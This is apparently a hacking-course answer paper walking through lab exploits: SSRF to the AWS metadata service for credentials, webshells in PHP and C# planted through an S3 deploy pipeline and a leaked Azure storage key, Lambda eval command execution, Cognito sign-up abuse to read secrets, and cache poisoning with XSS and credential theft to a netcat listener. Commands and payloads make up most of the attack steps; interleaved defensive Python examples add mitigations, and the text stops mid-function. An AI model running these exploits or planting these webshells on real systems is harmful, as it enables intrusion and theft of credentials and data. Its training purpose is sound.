
Advanced Web Hacking (Part 4) Answer Paper

NSS Training – AWH 5D Answer Paper

Contents

Module: Cloud Pentesting (page 2)
• AWS - SSRF Exploitation - Elastic Beanstalk (page 2)
• AWS Serverless Exploitation (page 13)
• Leaked Storage Account (page 19)
• Exploiting AWS Cognito Misconfigurations (page 27)

Module: Web Cache Attacks (page 36)
• Web Cache Deception (page 36)
• Web Cache Poisoning (page 40)

Module: Miscellaneous Vulnerabilities (page 46)
• Unicode Normalization Attack (page 46)
• Second-order IDOR (page 51)
• Leverage Git misconfiguration to ViewState RCE (page 56)
• HTTP Desync Attacks (page 62)

© Claranet Cyber Security 2021. All rights reserved

Module: Cloud Pentesting

AWS - SSRF Exploitation - Elastic Beanstalk

Challenge URL: http://cloud.webhacklab.com/view_pospdocument.php?doc={}

• Identify and exploit SSRF vulnerability to gain access to S3 buckets and download the
source of the application hosted on AWS cloud.
• Upload a webshell via Continuous Deployment (CD) pipeline.

Solution:
Step 1: Navigate to the URL
“http://cloud.webhacklab.com/view_pospdocument.php?doc=https://raw.githubusercontent.com/nirhua/test/master/cloud-memes.jpg”


Step 2: By default, Apache’s server-status page is not accessible from the internet but only via
localhost, as shown below.

Step 3: Intercept the above request and supply “http://localhost/server-status” in the “doc” parameter.
Because of the SSRF vulnerability the page content is returned, as shown below.

Note: Server fingerprinting confirms that the hosting provider is Amazon.


Step 4: Retrieve the IAM account number and instance profile ID by passing the metadata URL to the “doc” parameter:

http://cloud.webhacklab.com/view_pospdocument.php?doc=http://169.254.169.254/latest/meta-data/iam/info

Account number: 696XXXXX79

Instance Profile Id: AIPAIAPD5TXQPXXXXXXXX


Step 5: Retrieve the region by passing the following metadata URL to the “doc” parameter.

http://169.254.169.254/latest/dynamic/instance-identity/document

Region: us-east-1


Step 6: Navigate to the URL below to retrieve the AccessKeyId, SecretAccessKey and Token:

http://cloud.webhacklab.com/view_pospdocument.php?doc=http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role
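Steps 3 to 6 work because the document viewer fetches whatever URL it is given. Added example, not part of the original answer paper: a Python outbound-URL check of the kind the application should apply before fetching, combining a host allowlist with a check on every address the host resolves to, so that localhost, the 169.254.169.254 metadata endpoint and an allowlisted hostname that resolves to an internal address are all refused. The allowlist entries (raw.githubusercontent.com, docs.example.com) and the constructed DNS table used for the offline demo are assumptions for the example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hosts the document viewer legitimately needs to fetch from (constructed
# allowlist; a real application would load this from configuration).
ALLOWED_HOSTS = {"raw.githubusercontent.com", "docs.example.com"}

# Networks that must never be reachable through a server-side fetch. The first
# two cover exactly what Steps 3-6 abuse: the loopback interface and the
# link-local range that carries the instance metadata service.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "169.254.0.0/16", "10.0.0.0/8", "172.16.0.0/12",
    "192.168.0.0/16", "0.0.0.0/8", "::1/128", "fe80::/10", "fc00::/7",
    "::ffff:0:0/96",   # IPv4-mapped IPv6 forms of the ranges above
)]

def resolve_host(host):
    """Default resolver: every address the name maps to, as strings."""
    try:
        return [str(ipaddress.ip_address(host))]   # already a literal address
    except ValueError:
        return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

# Constructed DNS answers so the demo and its checks run without network access.
CONSTRUCTED_DNS = {
    "raw.githubusercontent.com": ["185.199.108.133"],
    "docs.example.com": ["169.254.169.254"],   # a rebinding-style answer
}

def table_resolver(host):
    return CONSTRUCTED_DNS.get(host, [])

def check_fetch_url(url, resolver=resolve_host):
    """Return (allowed, reason). allowed is True only when the scheme is http(s),
    the host is on the allowlist and every address it resolves to is public."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme %r not allowed" % parts.scheme
    host = parts.hostname   # lower-cased, brackets stripped, userinfo removed
    if not host:
        return False, "no host in URL"
    if host not in ALLOWED_HOSTS:
        return False, "host %r not on allowlist" % host
    addrs = resolver(host)
    if not addrs:
        return False, "host %r does not resolve" % host
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        for net in BLOCKED_NETWORKS:
            if ip in net:
                return False, "%s resolves to %s in blocked range %s" % (host, ip, net)
    return True, "ok"

if __name__ == "__main__":
    for u in ("https://raw.githubusercontent.com/nirhua/test/master/cloud-memes.jpg",
              "http://localhost/server-status",
              "http://169.254.169.254/latest/meta-data/iam/info",
              "https://docs.example.com/report.pdf",
              "file:///etc/passwd"):
        print(u, "->", check_fetch_url(u, resolver=table_resolver))
```

The address check has to be applied to the address that is actually connected to (after redirects, and pinned between resolution and connection), otherwise a redirect or a DNS answer that changes between check and fetch bypasses it. On the instance side, requiring IMDSv2 makes the credential read in Step 6 considerably harder, because IMDSv2 only answers requests that carry a session token obtained with a PUT request, which a simple URL-fetch SSRF cannot issue.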


Step 7: Set up the AWS Command Line Interface (CLI) in the Kali terminal.

root@kali:~# export AWS_ACCESS_KEY_ID=ASIA2EG3F.............

root@kali:~# export AWS_SECRET_ACCESS_KEY=mhEI+cQUGIy79XMqm6nlXrV……...

root@kali:~# export AWS_DEFAULT_REGION=us-east-1

root@kali:~# export AWS_SESSION_TOKEN=FQoGZXIvYXdzEIf//////////wEaDCaPfjkbqj20….


Step 8: Access the S3 bucket from the Kali terminal.

root@kali:~# aws s3 ls

As shown, access is denied; this could be due to the IAM policies attached to the role.

Step 9: The managed policy “AWSElasticBeanstalkWebTier” by default only allows access to S3
buckets whose names start with “elasticbeanstalk”.

Reference: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/iam-instanceprofile.html

To access the S3 bucket we need to know the bucket name. Elastic Beanstalk creates an
Amazon S3 bucket named elasticbeanstalk-region-account-id for each region in which you create
environments with the role aws-elasticbeanstalk-ec2-role. Elastic Beanstalk uses this bucket to store
objects, for example temporary configuration files, that are required for the proper operation of your
application. Both parts of the name were already obtained from the metadata service:

• http://169.254.169.254/latest/meta-data/iam/info
  o "InstanceProfileArn" : "arn:aws:iam::6XXXXXX79:instance-profile/aws-elasticbeanstalk-ec2-role"
• http://169.254.169.254/latest/user-data
  o Access zone information


Step 10: Use the AWS CLI to gain access to the bucket:

root@kali:~# aws s3 ls s3://elasticbeanstalk-region-account-id/ --recursive

Example: aws s3 ls s3://elasticbeanstalk-us-east-1-6XXXXX79/ --recursive

Step 11: To download the source code use the following command:

root@kali:~# aws s3 cp s3://elasticbeanstalk-us-east-1-6XXXXX79/ {destination local path} --recursive


Pivoting from SSRF to RCE

The software release, in this case, is automated using AWS CodePipeline, with an S3 bucket as the source
repository and Elastic Beanstalk as the deployment provider. AWS CodePipeline is a CI/CD service
that builds, tests and deploys code every time the code changes (according to the pipeline policy). The
pipeline supports GitHub, Amazon S3 and AWS CodeCommit as source providers and multiple
deployment providers, including Elastic Beanstalk. The official AWS blog post on how this works can be
found here.

Step 12: Create a new PHP file (webshell) as shown in the figure:

File: webshell00X.php

<html>
<body>
<form method="get" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="call" id="call" size="80">
<input type="submit" value="go">
</form>
<pre>
<h1> My Webshell 1001 </h1>
<?php
if (isset($_GET['call']))
    system($_GET['call']);
?>
</pre>
</body>
</html>

Step 13: Add the newly created file to the 2019028gtB-InsuranceBroking-stag-v2.0024.zip file as shown
below:

root@kali:~# zip -ur 2019028gtB-InsuranceBroking-stag-v2.0024.zip webshell00X.php

Step 14: To check that the file has been added to the zip, run the following command and locate the shell file:

root@kali:~# vi 2019028gtB-InsuranceBroking-stag-v2.0024.zip


Step 15: Now, upload the archive to the S3 bucket using the AWS CLI, as shown in the figure:

root@kali:~# aws s3 cp 2019028gtB-InsuranceBroking-stag-v2.0024.zip s3://elasticbeanstalk-us-east-1-696XXXXXXXXX/

Step 16: As soon as the new file is uploaded, CodePipeline starts the build process and, if everything
is OK, deploys the code to the Elastic Beanstalk environment.

Once the pipeline has completed, we can access the webshell and execute arbitrary commands
on the system, as shown below.

http://cloud.webhacklab.com/webshell00X.php

We successfully have an RCE!


AWS Serverless Exploitation

Challenge URL: https://8nfjm12vx0.execute-api.us-east-2.amazonaws.com/default/awh-lambda-demo?query='notsosecure'

• Identify and exploit a Remote Code Execution vulnerability in the Lambda function
• Obtain secret tokens
• Gain access to the S3 bucket
• Connect to the EC2 instance

Solution:
Step 1: Navigate to our serverless Lambda application, which takes input from the “query” parameter.
Notice how the input from the query parameter is reflected back on the page.

https://8nfjm12vx0.execute-api.us-east-2.amazonaws.com/default/awh-lambda-demo?query='notsosecure'


Step 2: Evaluate an expression by passing 5*5 in the query parameter. The expression is
evaluated, which implies that the Lambda function will evaluate any code provided as input,
leading to remote code execution.

https://8nfjm12vx0.execute-api.us-east-2.amazonaws.com/default/awh-lambda-demo?query=5*5

Step 3: Now that we know the application evaluates expressions, use the “require” function to
execute commands on the host and read the contents of the file “/etc/passwd”, as shown below:

https://8nfjm12vx0.execute-api.us-east-2.amazonaws.com/default/awh-lambda-demo?query=require(%27child_process%27).execSync(%27cat%20/etc/passwd%27);
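The root cause in Steps 2 and 3 is that the function hands the query parameter straight to the runtime's evaluator. Added example in Python (the lab function is Node.js; this is not the lab's code): the unsafe pattern next to a hardened calculator that parses the input with the `ast` module and walks only numeric literals and arithmetic operators, so 5*5 still works while names, calls and attribute access are rejected before anything executes. The length and exponent limits are assumptions chosen for the example.

```python
import ast
import operator

# The only node types and operators the calculator understands. Anything else
# (names, attribute access, calls, subscripts, lambdas ...) is rejected before
# it is evaluated.
BIN_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
           ast.Div: operator.truediv, ast.FloorDiv: operator.floordiv,
           ast.Mod: operator.mod, ast.Pow: operator.pow}
UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}
MAX_LEN = 200        # assumption: limits chosen for this example
MAX_EXPONENT = 64    # keeps 2**100000-style input from pinning the CPU

def _eval_node(node):
    if isinstance(node, ast.Expression):
        return _eval_node(node.body)
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in BIN_OPS:
        left, right = _eval_node(node.left), _eval_node(node.right)
        if isinstance(node.op, ast.Pow) and abs(right) > MAX_EXPONENT:
            raise ValueError("exponent too large")
        return BIN_OPS[type(node.op)](left, right)
    if isinstance(node, ast.UnaryOp) and type(node.op) in UNARY_OPS:
        return UNARY_OPS[type(node.op)](_eval_node(node.operand))
    raise ValueError("unsupported syntax: %s" % type(node).__name__)

def unsafe_handler(query):
    """The anti-pattern behind Step 2: the request parameter goes straight to
    the language's evaluator, so any expression the runtime can run, runs."""
    return 200, str(eval(query))

def safe_handler(query):
    """Returns an (http_status, body) pair like a Lambda proxy handler would."""
    if len(query) > MAX_LEN:
        return 400, "expression too long"
    try:
        tree = ast.parse(query, mode="eval")
        return 200, str(_eval_node(tree))
    except (SyntaxError, ValueError, ZeroDivisionError, OverflowError) as exc:
        return 400, "rejected: %s" % exc

if __name__ == "__main__":
    for q in ("5*5", "(1+2)*3 - 4/2", "2**100000", "require('child_process')",
              "__import__('os')", "7/0"):
        print(repr(q), "->", safe_handler(q))
```

The hardened handler never calls `eval`; the parser produces a tree and the walker refuses every node type it was not written for, which is the property an allowlist needs. The same structure applies to a Node.js function: parse with a real expression parser and interpret a fixed grammar instead of calling `eval` or `new Function`.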


Step 4: Now that we can execute operating-system commands and know that this is an Amazon
instance, read the environment variables to obtain the AWS keys, which are generally stored there.
The “env” command prints all environment variables available to the process the application runs as.

https://8nfjm12vx0.execute-api.us-east-2.amazonaws.com/default/awh-lambda-demo?query=require(%27child_process%27).execSync(%27env%27);

Step 5: Set up the AWS Command Line Interface (CLI) in the Kali terminal.

root@kali:~# export AWS_ACCESS_KEY_ID=ASIA2EG3F6XXXXXXXXXX

root@kali:~# export AWS_SECRET_ACCESS_KEY=9STIiddjS/D/XXXXsCM7Yj1IMaUmXXXXXXXXX

root@kali:~# export AWS_DEFAULT_REGION=us-east-2

root@kali:~# export AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEOr//////////wEa………….


Step 6: Run the “aws_enum” script to discover which AWS services the following set of credentials
has access to (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN):

root@kali:~/tools/# python3 aws_enum.py --access-key ASIA2EG3F6XXXXXXXXXX --secret-key 9STIiddjS/D/XXXXsCMtbG7Yj1IMaUmXXXXXXXXX --session-token AgoJb3JpZ2luX2VjEGYaCXVzLWV... --region us-east-2

Note: The compromised AWS keys have read access to S3 buckets, EC2 instances and Secrets Manager.


Step 7: Let us access the “nss-lambda-demo” S3 bucket and search for interesting information. As
observed, this bucket contains the file “aws-ec2-solr.pem”, which is the private key for another internal server.

root@kali:~/tools/# python3 aws_enum.py --access-key ASIA2EG3F6XXXXXXXXXX --secret-key 9STIiddjS/D/XXXXsCMtbG7Yj1IMaUmXXXXXXXXX --session-token AgoJb3JpZ2luX2VjEGYaCXVzLWV... --region us-east-2 --command "aws s3 sync s3://nss-lambda-demo lambda-demo-files"

Step 8: We don't know which server can be accessed with the “aws-ec2-solr.pem” key, so let us
list all the EC2 instances visible to the AWS keys compromised earlier.

root@kali:~/tools/# python3 aws_enum.py --access-key ASIA2EG3F6XXXXXXXXXX --secret-key 9STIiddjS/D/XXXXsCMtbG7Yj1IMaUmXXXXXXXXX --session-token AgoJb3JpZ2luX2VjEGYaCXVzLWV... --region us-east-1 --command "aws ec2 describe-instances"


As you may have seen, the output of “ec2 describe-instances” is voluminous, so it may be necessary to
save the output to a text file and search it for the key name “aws-ec2-solr.pem”.
Doing so shows that the key file belongs to the instance “i-0c81d2e81dee1ebfc”.

Step 9: From the instance details we can now find the EC2 public DNS name, which is
“ec2-34-229-88-54.compute-1.amazonaws.com”. Let us connect to it using the previously obtained
key file to complete the task.

root@kali:~/tools/# chmod 400 aws-ec2-solr.pem

root@kali:~/tools/# ssh -i aws-ec2-solr.pem ec2-user@ec2-34-229-88-54.compute-1.amazonaws.com


Leaked Storage Account

Challenge URL: N/A

• Extract the source code and achieve Remote Code Execution on the function from the
storage account of “notsosporty” using the techniques learned in this module.

Solution:
Step 1: To find the exposed Azure AccountName and AccountKey, use the GitHub search feature with
Azure-specific keywords such as DefaultEndpointsProtocol, AccountName and AccountKey together
with the target name (i.e. notsosecure-org).

https://github.com/search?q=notsosporty

Some examples are as follows:

• https://github.com/search?q=notsosporty&type=Users
• https://github.com/search?q=notsosporty
• https://github.com/search?q=user%3Anotsosporty+AccountName&type=Code
• https://github.com/search?q=user%3Anotsosporty+AccountKey&type=Code
• https://github.com/search?q=user%3Anotsosporty+azure&type=Repositories


Step 2: Note the exposed Azure AccountName and AccountKey found in the previous step.

Step 3: To validate that a file share exists for the acquired AccountName and AccountKey, run the
following Azure CLI command:

root@kali:~/Desktop/test_azure# az storage share exists --account-name fnappvta035 --account-key HApIrSbCEBWCWQVnvcUXfrNvbzIwwUzIZH3lUkQeQI5uOqv7QGmGrf4L/aPYnSw2PqbHdEjxsY16Bx78mbyXQw== --name fnappvta035


Step 4: Download the contents of the file share found in the previous step using the following command:

root@kali:~/Desktop/test_azure# az storage file download-batch --account-name fnappvta035 --account-key HApIrSbCEBWCWQVnvcUXfrNvbzIwwUzIZH3lUkQeQI5uOqv7QGmGrf4L/aPYnSw2PqbHdEjxsY16Bx78mbyXQw== --destination . --source fnappvta035 --no-progress

Step 5: On downloading the source code, it is observed that C# scripts are in use; this can be
confirmed by viewing the contents of the file run.csx, as shown below:

root@kali:~/Desktop/test_azure# cat site/wwwroot/HttpTrigger1/run.csx


Step 6: In order to achieve remote code execution on the target function, replace the contents of the
“site/wwwroot/HttpTrigger1/run.csx” file with the following webshell code:

#r "Newtonsoft.Json"

using System.Net;
using Microsoft.AspNetCore.Mvc;
using Microsoft.Extensions.Primitives;
using Newtonsoft.Json;
using System;
using System.IO;
using System.Diagnostics;

public static async Task<IActionResult> Run(HttpRequest req, ILogger log)
{
    log.LogInformation("C# HTTP trigger function processed a request.");

    // The command is taken from ?cmd= or from the "cmd" property of a JSON body.
    string cmd = req.Query["cmd"];
    string requestBody = await new StreamReader(req.Body).Re.ReadToEndAsync();
    dynamic data = JsonConvert.DeserializeObject(requestBody);
    cmd = cmd ?? data?.cmd;

    return cmd != null
        ? (ActionResult)new OkObjectResult(ExcuteCmd(cmd))
        : new BadRequestObjectResult("Please pass a name on the query string or in the request body");
}

public static string ExcuteCmd(string arg)
{
    // Runs the argument through cmd.exe and returns its standard output.
    ProcessStartInfo psi = new ProcessStartInfo();
    psi.FileName = "cmd.exe";
    psi.Arguments = "/c " + arg;
    psi.RedirectStandardOutput = true;
    psi.UseShellExecute = false;
    Process p = Process.Start(psi);
    StreamReader stmrdr = p.StandardOutput;
    string s = stmrdr.ReadToEnd();
    stmrdr.Close();
    return s;
}


Step 7: The updated “run.csx” file now contains the webshell code, as shown below:

root@kali:~/Desktop/test_azure# cat site/wwwroot/HttpTrigger1/run.csx

Step 8: Copy the “HttpTrigger1” folder to “HttpTriggerX” (replace X with your user id):

root@kali:~/Desktop/test_azure# cp -r site/wwwroot/HttpTrigger1 site/wwwroot/HttpTriggerX


Step 9: Now, upload all the files present in “/root/site/wwwroot/HttpTriggerX/” on the local
system to the Azure storage account.

root@kali:~/Desktop/test_azure# az storage file upload-batch --account-key HApIrSbCEBWCWQVnvcUXfrNvbzIwwUzIZH3lUkQeQI5uOqv7QGmGrf4L/aPYnSw2PqbHdEjxsY16Bx78mbyXQw== --account-name fnappvta035 --destination fnappvta035 --destination-path site/wwwroot/HttpTriggerX/ --source /root/{localpath}/site/wwwroot/HttpTriggerX/

Step 10: The next step is to find the Function API URL.

First, list the containers associated with the account using the command below:

root@kali:~/Desktop/test_azure# az storage container list --account-name fnappvta035 --account-key HApIrSbCEBWCWQVnvcUXfrNvbzIwwUzIZH3lUkQeQI5uOqv7QGmGrf4L/aPYnSw2PqbHdEjxsY16Bx78mbyXQw==


Step 11: Once we have the container names, download the blobs in the container
“azure-webjobs-secrets” using the command below:

root@kali:~/Desktop/test_azure# az storage blob download-batch --account-name fnappvta035 --account-key HApIrSbCEBWCWQVnvcUXfrNvbzIwwUzIZH3lUkQeQI5uOqv7QGmGrf4L/aPYnSw2PqbHdEjxsY16Bx78mbyXQw== --destination . --source azure-webjobs-secrets

Step 12: By exploring the “fnappvt/host.json” file we can locate the function URL:

root@kali:~/Desktop/test_azure# cat fnappvt/host.json


Step 13: Access the webshell using the URL identified in the above step:

URL: https://fnappvt.azurewebsites.net/api/HttpTriggerX?cmd=dir


Exploiting AWS Cognito Misconfigurations

Challenge URL: http://cognito.webhacklab.com/

• Identify the AWS Cognito misconfiguration and read the secrets from Secrets Manager.

Solution:
Step 1: Access the application hosted at http://cognito.webhacklab.com. It can be observed that the
application does not allow public registration.


Step 2: In the HTML source, observe that there is a file named ‘config.js’. Access the file
and view its contents.

Step 3: The file is an AWS Cognito configuration containing ‘userPoolId’, ‘identityPoolId’ and
‘clientId’. This tells us that the application uses the AWS Cognito JavaScript SDK to authenticate users.


Step 4: Now try to sign up to the application using the given configuration. Use the command below
to sign up and create an account.

root@kali:~# aws cognito-idp sign-up --client-id m8ca1fea9uico5qml43na3fp --username userX@webhacklab.com --password P@ssw0rd1 --user-attributes Name="email",Value="userX@mailinator.com" Name="name",Value="UserX"

Step 5: Once the account is created, a verification code is sent to the email address. Use this code to
activate the user.


Step 6: Use the above code along with the client-id and username to confirm the user with the
following command.

Note: When the command executes successfully there is no output.

root@kali:~# aws cognito-idp confirm-sign-up --client-id m8ca1fea9uico5qml43na3fp --username=userX@webhacklab.com --confirmation-code XXXXXX

Step 7: Log in to the application with the newly activated credentials.


Step 8: The user is successfully logged in but does not have any authorization over the application,
as shown in the figure below.

Step 9: Once the user is authenticated, the application generates an ‘accessToken’, ‘idToken’ and
‘refreshToken’ and stores them in the browser’s local storage. To access these values, open the
browser inspector on the page from step 8 and check the storage tab.

Step 10: Alternatively, you can check the response of the login action in Burp. It contains the
‘accessToken’, ‘idToken’ and ‘refreshToken’.


Step 11: Capture the IdentityPoolName.


Step 12: Generate an authenticated Cognito identity ID using the ‘IdToken’, ‘IdentityPoolId’ and
‘IdentityPoolName’ as shown below:

root@kali:~# aws cognito-identity get-id --identity-pool-id us-east-1:d7f1908a-a2f8-4c6e-b6b1-9060d9830fb3 --logins cognito-idp.us-east-1.amazonaws.com/us-east-1_EOn8m3ula=<IdToken>

Step 13: Use the ‘IdentityId’ obtained in the above step to create temporary AWS credentials,
again supplying the ‘IdToken’, ‘IdentityPoolId’ and ‘IdentityPoolName’ as shown below:

root@kali:~# aws cognito-identity get-credentials-for-identity --identity-id us-east-1:85948f47-1237-479a-a9e8-ab021747cae5 --logins cognito-idp.us-east-1.amazonaws.com/us-east-1_EOn8m3ula=<IdToken>


Step 14: Configure the AWS Command Line Interface (CLI) with the credentials obtained above so
that it can interact with AWS services:

root@kali:~# export AWS_ACCESS_KEY_ID=XXXXXXXXX

root@kali:~# export AWS_SECRET_ACCESS_KEY=XXXXXXXXX

root@kali:~# export AWS_SESSION_TOKEN=XXXXXXXXX

root@kali:~# export AWS_DEFAULT_REGION=us-east-1

Step 15: Execute the following command to verify that the credentials configured in the above step
are valid:

root@kali:~# aws sts get-caller-identity


Step 16: Since the objective is to obtain the secrets from Secrets Manager, query the
‘secretsmanager’ service using the current session. Enter the command as shown below:

root@kali:~# aws secretsmanager list-secrets

Step 17: The output shows that a ‘Cloud_API’ secret is available. Query its secret-id with the
following command to retrieve the decrypted secret value, as shown below.

root@kali:~# aws secretsmanager get-secret-value --secret-id arn:aws:secretsmanager:us-east-1:6962XXXXX9:secret:Cloud_API-zpPdXO
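Steps 4 to 17 chain two settings: the user pool accepts self sign-up although the application offers no registration form, and the identity pool's authenticated role carries Secrets Manager permissions. Added example, not part of the original answer paper: a Python audit over the JSON that `aws cognito-idp describe-user-pool`, `aws cognito-identity describe-identity-pool` and the role's policy document provide, flagging AllowAdminCreateUserOnly=false, AllowUnauthenticatedIdentities=true, and any Allow statement whose Action pattern covers a sensitive action (NotAction grants are handled as well; Condition blocks are ignored). The pool IDs, the sensitive-action list and the sample policies are constructed; the field names are the real API fields.

```python
import fnmatch

# Actions that a role handed out to self-registered Cognito users should not
# carry (constructed list for this example; extend it to your environment).
SENSITIVE_ACTIONS = [
    "secretsmanager:GetSecretValue",
    "secretsmanager:ListSecrets",
    "s3:ListAllMyBuckets",
    "ec2:DescribeInstances",
    "iam:PassRole",
]

def _as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]

def _matches(action, patterns):
    # IAM action matching is case-insensitive and supports the * and ? wildcards.
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)

def find_sensitive_grants(policy):
    """Return (action, resource, sid) for every Allow statement that grants a
    sensitive action, either through Action patterns or by not excluding it in
    NotAction. Condition blocks are not evaluated (assumption for this example)."""
    hits = []
    for i, st in enumerate(_as_list(policy.get("Statement"))):
        if st.get("Effect") != "Allow":
            continue
        sid = st.get("Sid", "Statement[%d]" % i)
        actions, excluded = _as_list(st.get("Action")), _as_list(st.get("NotAction"))
        for action in SENSITIVE_ACTIONS:
            granted = _matches(action, actions) or (excluded and not _matches(action, excluded))
            if granted:
                for resource in _as_list(st.get("Resource")):
                    hits.append((action, resource, sid))
    return hits

def audit_cognito(user_pool, identity_pool, authenticated_role_policy):
    """user_pool: the UserPool object from describe-user-pool; identity_pool: the
    describe-identity-pool result; authenticated_role_policy: the policy document
    attached to the identity pool's authenticated role. Returns finding strings."""
    findings = []
    admin_only = user_pool.get("AdminCreateUserConfig", {}).get("AllowAdminCreateUserOnly", False)
    if not admin_only:
        findings.append("user pool %s allows self sign-up (AllowAdminCreateUserOnly=false); "
                        "anyone holding the public ClientId can call cognito-idp sign-up"
                        % user_pool.get("Id"))
    if identity_pool.get("AllowUnauthenticatedIdentities"):
        findings.append("identity pool %s hands out credentials to unauthenticated identities"
                        % identity_pool.get("IdentityPoolId"))
    for action, resource, sid in find_sensitive_grants(authenticated_role_policy):
        findings.append("authenticated role grants %s on %s (statement %s)" % (action, resource, sid))
    return findings

# Constructed inputs shaped like the real API responses and policy documents.
SAMPLE_USER_POOL = {"Id": "us-east-1_EXAMPLE", "AdminCreateUserConfig": {"AllowAdminCreateUserOnly": False}}
SAMPLE_USER_POOL_FIXED = {"Id": "us-east-1_EXAMPLE", "AdminCreateUserConfig": {"AllowAdminCreateUserOnly": True}}
SAMPLE_IDENTITY_POOL = {"IdentityPoolId": "us-east-1:00000000-0000-0000-0000-000000000000",
                        "AllowUnauthenticatedIdentities": False}
SAMPLE_AUTH_ROLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "CognitoDefault", "Effect": "Allow",
         "Action": ["mobileanalytics:PutEvents", "cognito-sync:*"], "Resource": "*"},
        {"Sid": "TooBroad", "Effect": "Allow", "Action": "secretsmanager:*", "Resource": "*"},
    ],
}
SAMPLE_AUTH_ROLE_POLICY_FIXED = {"Version": "2012-10-17", "Statement": [SAMPLE_AUTH_ROLE_POLICY["Statement"][0]]}

if __name__ == "__main__":
    for f in audit_cognito(SAMPLE_USER_POOL, SAMPLE_IDENTITY_POOL, SAMPLE_AUTH_ROLE_POLICY):
        print("FINDING:", f)
    print("fixed:", audit_cognito(SAMPLE_USER_POOL_FIXED, SAMPLE_IDENTITY_POOL, SAMPLE_AUTH_ROLE_POLICY_FIXED))
```

The check deliberately reports every sensitive grant, wildcard or not, because a Cognito authenticated role is effectively a public role whenever sign-up is open: the exact secret-id queried in Step 17 only matters to the attacker, not to the reviewer deciding whether the role should touch Secrets Manager at all.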


Module: Web Cache Attacks

Web Cache Deception

Challenge URL: http://webcache.webhacklab.com:8080/login.php

• Identify a Web Cache Deception vulnerability to access, without authentication, sensitive content
that would otherwise only be accessible to an authenticated user.

Solution:
Step 1: Navigate to http://webcache.webhacklab.com:8080/login.php. Try to access index.php, i.e.
http://webcache.webhacklab.com:8080/index.php. It will not be accessible and will keep redirecting
to the login page, as it requires authentication.


Step 2: Try appending a non-existent static file name, for example non-existent.css, to the end of the
URL (i.e. http://webcache.webhacklab.com:8080/login.php/non-existent.css). Observe that the
application still loads login.php, and that the “X-Cache” header shows the server caches public static files.

Note: Other public static file extensions such as gif, png and ico can be used as well.


Step 3: To exploit this, log in to the application using the credentials username1:password1. After login, you
will be taken to the http://webcache.webhacklab.com:8080/index.php page. Now, armed with the
knowledge from the previous step, again append a non-existent public static file to the end of the URL
(e.g. http://webcache.webhacklab.com:8080/index.php/non-existent.css) and submit it. This caches the
contents of index.php on the server under the path index.php/non-existent.css.


Step 4: Now that the cache entry has been created, access the same link from a different browser or from
a different remote location to retrieve the contents of “index.php” without authentication.

http://webcache.webhacklab.com:8080/index.php/non-existent.css


Web Cache Poisoning

Challenge URL: http://webcache.webhacklab.com/

• Identify whether the application uses any unkeyed inputs and whether the server caches the
resulting output. Then place malicious payloads in those unkeyed inputs to do the following to a
random user who requests the poisoned cache:

a) Perform Cross-Site Scripting

b) Execute a malicious script from a remote location controlled by us

c) Steal credentials through form submission to a remote location controlled by us

Note: The cache TTL is set to 20 seconds.

Solution:
Step 1: Navigate to http://webcache.webhacklab.com/ and observe that the Host header value is used by
the application in multiple places in the response.


Step 2: Next, determine whether the “Host” header value can be overridden with a custom one using
alternative headers such as “X-Forwarded-Host”. As shown below, it can.

X-Forwarded-Host: test123


A. Cross-site Scripting:
Step 3: After the above step, wait 20 seconds for the cache entry to expire, then submit the header below with a
custom XSS payload. After submission the response is cached on the Varnish server.

X-Forwarded-Host: <script>prompt('Password')</script>

Step 4: The response is cached. Try accessing the same page from another IP address or browser. The
cached page is served, resulting in XSS.


B. Execute a malicious script from a remote location controlled by us.

Step 5: Similarly, we observed that submitting the ‘X-NotSoSecure-Script’ header changes the location
the script is loaded from. Therefore, submit the header below, pointing at a remote server hosting a
different JavaScript file with the same name.

X-NotSoSecure-Script: 192.168.4.X:1234

Step 6: The cache is poisoned. When a random user accesses the same cached page from a different
location or browser, it loads the malicious script from the remote machine controlled by us and
executes it.


C. Steal credentials through form submission

Step 7: Similarly, we observe that the “X-Steal-Creds” header can be used to poison the form URL so that
authentication credentials are sent to a remote server. To do this, submit the header below with the payload.

X-Steal-Creds: 192.168.4.X:1234


Step 8: As soon as a random user submits their credentials on the poisoned cached page, the
credentials are sent to our listener, as shown in the figure below.

nc -lvp 1234
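Both attacks in this module come down to what the cache stores and under which key. Added example, not the lab's Varnish configuration: a Python model of an edge cache in front of a constructed origin that behaves like the lab application (PHP scripts answering for any sub-path, pages embedding the host taken from X-Forwarded-Host when present). The flawed policy caches by file extension and leaves X-Forwarded-Host unkeyed, reproducing Web Cache Deception (Steps 2-4 of the previous section) and Web Cache Poisoning (Steps 2-8 here); the fixed policy honours only the origin's Cache-Control, never stores a response generated for a request carrying a session cookie, and strips client-supplied forwarding headers at the edge. Hostnames and the session cookie name are assumptions.

```python
STATIC_EXTS = (".css", ".js", ".png", ".gif", ".ico")
SESSION_COOKIE = "PHPSESSID"   # assumption: the app's session cookie name

def make_request(path, host="webcache.example", headers=None, cookies=None):
    # Constructed request; header names are lower-cased so lookups are uniform.
    h = {"host": host}
    h.update({k.lower(): v for k, v in (headers or {}).items()})
    return {"method": "GET", "path": path, "headers": h, "cookies": dict(cookies or {})}

def origin(req):
    """Constructed origin modelled on the lab app: PHP scripts answer for any
    sub-path (PATH_INFO), and pages embed whichever host the app believes it
    was requested under, X-Forwarded-Host taking precedence over Host."""
    path, h = req["path"], req["headers"]
    host = h.get("x-forwarded-host") or h["host"]
    if path.startswith("/index.php"):            # logged-in area
        if req["cookies"].get(SESSION_COOKIE) != "valid-session":
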